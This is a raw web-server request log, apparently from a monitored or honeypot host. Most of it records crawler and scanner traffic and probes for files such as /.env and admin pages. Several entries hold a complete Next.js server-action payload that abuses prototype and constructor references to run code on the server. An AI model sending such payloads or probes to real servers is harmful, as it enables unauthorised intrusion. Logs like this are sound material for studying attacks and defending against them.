Host: livepoll.ru
RemoteAddr: 198.235.24.110:65518
Path: /
URL: /
Method: GET
[2026-02-25 04:23:28] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:56118
Path: /jars
URL: /jars
Method: GET
[2026-02-25 03:42:21] === HTTP Request ===
[2026-02-25 02:22:12] Main page accessed - IP: 207.90.244.22:57012
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.22:57012
Path: /
URL: /
Method: GET
[2026-02-25 02:22:12] === HTTP Request ===
[2026-02-25 01:41:48] Main page accessed - IP: 205.210.31.186:63454
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 205.210.31.186:63454
Path: /
URL: /
Method: GET
[2026-02-25 01:41:48] === HTTP Request ===
[2026-02-25 01:26:56] Main page accessed - IP: 87.236.176.98:36695
===================
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Accept: */*
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.236.176.98:36695
Path: /
URL: /
Method: GET
[2026-02-25 01:26:56] === HTTP Request ===
===================
Sec-Gpc: 1
Sec-Ch-Ua-Mobile: ?0
Referer: http://95.143.191.38:8081/
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: none
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Connection: keep-alive
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "Linux"
Sec-Fetch-User: ?1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.248.199.152:51768
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 23:16:02] === HTTP Request ===
[2026-02-24 23:16:02] Main page accessed - IP: 104.248.199.152:51758
===================
Sec-Fetch-Site: none
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Ch-Ua-Platform: "Linux"
Connection: keep-alive
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.5
Sec-Gpc: 1
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.248.199.152:51758
Path: /
URL: /
Method: GET
[2026-02-24 23:16:02] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.102.40.205:45370
Path: /manager/html
URL: /manager/html
Method: GET
[2026-02-24 23:06:27] === HTTP Request ===
[2026-02-24 21:13:10] Main page accessed - IP: 176.65.149.45:35226
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:35226
Path: /
URL: /
Method: GET
[2026-02-24 21:13:10] === HTTP Request ===
===================
------WebKitFormBoundaryx2118740867101--
------WebKitFormBoundaryx2118740867101
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2118740867101
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 339300+true+6244447;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2118740867101
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 522
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_2118740867101
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2118740867101
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:40974
Path: /api/route
URL: /api/route
Method: POST
[2026-02-24 21:02:31] === HTTP Request ===
===================
------WebKitFormBoundaryx285240094217--
------WebKitFormBoundaryx285240094217
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx285240094217
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 61304+true+4652879;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx285240094217
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_285240094217
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx285240094217
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:40966
Path: /app
URL: /app
Method: POST
[2026-02-24 21:02:31] === HTTP Request ===
===================
------WebKitFormBoundaryx570552202273--
------WebKitFormBoundaryx570552202273
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx570552202273
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 262992+true+2169466;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx570552202273
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx570552202273
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_570552202273
Accept-Encoding: gzip, deflate
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:40962
Path: /_next/server
URL: /_next/server
Method: POST
[2026-02-24 21:02:31] === HTTP Request ===
===================
------WebKitFormBoundaryx695347051295--
------WebKitFormBoundaryx695347051295
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx695347051295
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 214871+true+3236114;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx695347051295
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_695347051295
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx695347051295
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:40954
Path: /api
URL: /api
Method: POST
[2026-02-24 21:02:31] === HTTP Request ===
===================
------WebKitFormBoundaryx1902739327232--
------WebKitFormBoundaryx1902739327232
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1902739327232
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 317579+true+5991389;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1902739327232
X-Nextjs-Html-Request-Id: ilovepoop_1902739327232
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1902739327232
Accept-Encoding: gzip, deflate
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:40942
Path: /_next
URL: /_next
Method: POST
[2026-02-24 21:02:31] === HTTP Request ===
[2026-02-24 21:02:31] Main page accessed - IP: 193.32.162.28:40924
===================
------WebKitFormBoundaryx2285381629098--
------WebKitFormBoundaryx2285381629098
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2285381629098
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 339829+true+6725093;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2285381629098
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_2285381629098
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2285381629098
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:40924
Path: /
URL: /
Method: POST
[2026-02-24 21:02:31] === HTTP Request ===
[2026-02-24 21:02:31] Main page accessed - IP: 193.32.162.28:40908
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:40908
Path: /
URL: /
Method: GET
[2026-02-24 21:02:31] === HTTP Request ===
[2026-02-24 20:43:30] Main page accessed - IP: 205.210.31.67:50344
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.67:50344
Path: /
URL: /
Method: GET
[2026-02-24 20:43:30] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:37074
Path: /jars
URL: /jars
Method: GET
[2026-02-24 20:28:14] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.61:9040
Path: /login.jsp
URL: /login.jsp
Method: GET
[2026-02-24 20:07:03] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.61:9040
Path: /login.html
URL: /login.html
Method: GET
[2026-02-24 20:06:59] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.61:9040
Path: /login.htm
URL: /login.htm
Method: GET
[2026-02-24 20:06:57] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.61:9040
Path: /cgi-bin/login.cgi
URL: /cgi-bin/login.cgi
Method: GET
[2026-02-24 20:06:55] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.61:9040
Path: /+CSCOE+/logon.html
URL: /+CSCOE+/logon.html
Method: GET
[2026-02-24 20:06:55] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.61:9040
Path: /index.html
URL: /index.html
Method: GET
[2026-02-24 20:06:54] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.61:9040
Path: /admin/index.html
URL: /admin/index.html
Method: GET
[2026-02-24 20:06:46] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.61:9040
Path: /manage/account/login
URL: /manage/account/login
Method: GET
[2026-02-24 20:06:45] === HTTP Request ===
[2026-02-24 20:06:44] Main page accessed - IP: 216.180.246.61:9040
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 216.180.246.61:9040
Path: /
URL: /
Method: GET
[2026-02-24 20:06:44] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.26
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57384
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-24 19:55:51] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.231.89.71:36151
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 19:23:20] === HTTP Request ===
[2026-02-24 19:20:42] Main page accessed - IP: 91.231.89.104:56073
===================
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Accept-Language: en-US,en;q=0.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.231.89.104:56073
Path: /
URL: /
Method: GET
[2026-02-24 19:20:42] === HTTP Request ===
[2026-02-24 19:00:01] Main page accessed - IP: 147.185.132.105:65038
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 147.185.132.105:65038
Path: /
URL: /
Method: GET
[2026-02-24 19:00:01] === HTTP Request ===
[2026-02-24 18:54:34] Main page accessed - IP: 205.210.31.170:60108
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: media.vulnberries.ru
RemoteAddr: 205.210.31.170:60108
Path: /
URL: /
Method: GET
[2026-02-24 18:54:34] === HTTP Request ===
[2026-02-24 18:50:47] Main page accessed - IP: 147.185.132.69:59182
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.69:59182
Path: /
URL: /
Method: GET
[2026-02-24 18:50:47] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.154:50715
Query: type=rau
Path: /Telerik.Web.UI.WebResource.axd
URL: /Telerik.Web.UI.WebResource.axd?type=rau
Method: GET
[2026-02-24 18:41:48] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.152:51533
Path: /api/session/properties
URL: /api/session/properties
Method: GET
[2026-02-24 18:41:38] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.152:34911
Path: /css/images/PTZOptics_powerby.png
URL: /css/images/PTZOptics_powerby.png
Method: GET
[2026-02-24 18:41:38] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.155:35755
Path: /webfig/
URL: /webfig/
Method: GET
[2026-02-24 18:41:28] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.153:41989
Path: /wp-json
URL: /wp-json
Method: GET
[2026-02-24 18:41:12] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.152:47367
Path: /license.txt
URL: /license.txt
Method: GET
[2026-02-24 18:40:55] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.153:56371
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 18:40:30] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.153:50339
Path: /ext-js/app/common/zld_product_spec.js
URL: /ext-js/app/common/zld_product_spec.js
Method: GET
[2026-02-24 18:40:30] === HTTP Request ===
[2026-02-24 18:40:30] Main page accessed - IP: 45.156.129.153:43359
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.153:43359
Path: /
URL: /
Method: GET
[2026-02-24 18:40:30] === HTTP Request ===
[2026-02-24 18:40:01] Login page accessed - IP: 45.156.129.152:36507
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.152:36507
Path: /login
URL: /login
Method: GET
[2026-02-24 18:40:01] === HTTP Request ===
[2026-02-24 18:39:26] Main page accessed - IP: 45.156.129.155:54163
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.155:54163
Path: /
URL: /
Method: GET
[2026-02-24 18:39:26] === HTTP Request ===
[2026-02-24 16:53:11] Main page accessed - IP: 205.210.31.102:61082
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 205.210.31.102:61082
Path: /
URL: /
Method: GET
[2026-02-24 16:53:11] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:48530
Path: /.env
URL: /.env
Method: GET
[2026-02-24 16:16:18] === HTTP Request ===
[2026-02-24 14:34:51] Main page accessed - IP: 147.185.132.12:64186
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 147.185.132.12:64186
Path: /
URL: /
Method: GET
[2026-02-24 14:34:51] === HTTP Request ===
[2026-02-24 14:28:17] Main page accessed - IP: 147.185.132.153:63978
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 147.185.132.153:63978
Path: /
URL: /
Method: GET
[2026-02-24 14:28:17] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.196.11.111:46008
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 13:41:24] === HTTP Request ===
[2026-02-24 13:41:13] Main page accessed - IP: 185.196.11.111:43200
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.196.11.111:43200
Path: /
URL: /
Method: GET
[2026-02-24 13:41:13] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65240
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 12:53:41] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65243
Path: /login.rsp
URL: /login.rsp
Method: GET
[2026-02-24 12:53:41] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Connection: close
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65242
Path: /nobody/favicon.ico
URL: /nobody/favicon.ico
Method: GET
[2026-02-24 12:53:40] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65224
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 12:53:40] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65237
Path: /image/lgbg.jpg
URL: /image/lgbg.jpg
Method: GET
[2026-02-24 12:53:39] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65236
Path: /skin/default_1/images/logo.png
URL: /skin/default_1/images/logo.png
Method: GET
[2026-02-24 12:53:39] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65226
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 12:53:39] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65244
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 12:53:38] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65229
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 12:53:38] === HTTP Request ===
===================
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65304
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 12:53:38] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65320
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-24 12:53:37] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, zstd
User-Agent: Opera/4.02 (Windows 98; U) [en]
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 4.180.183.243:65308
Path: /favicon.ico
URL: /favicon.ico
Method: GET
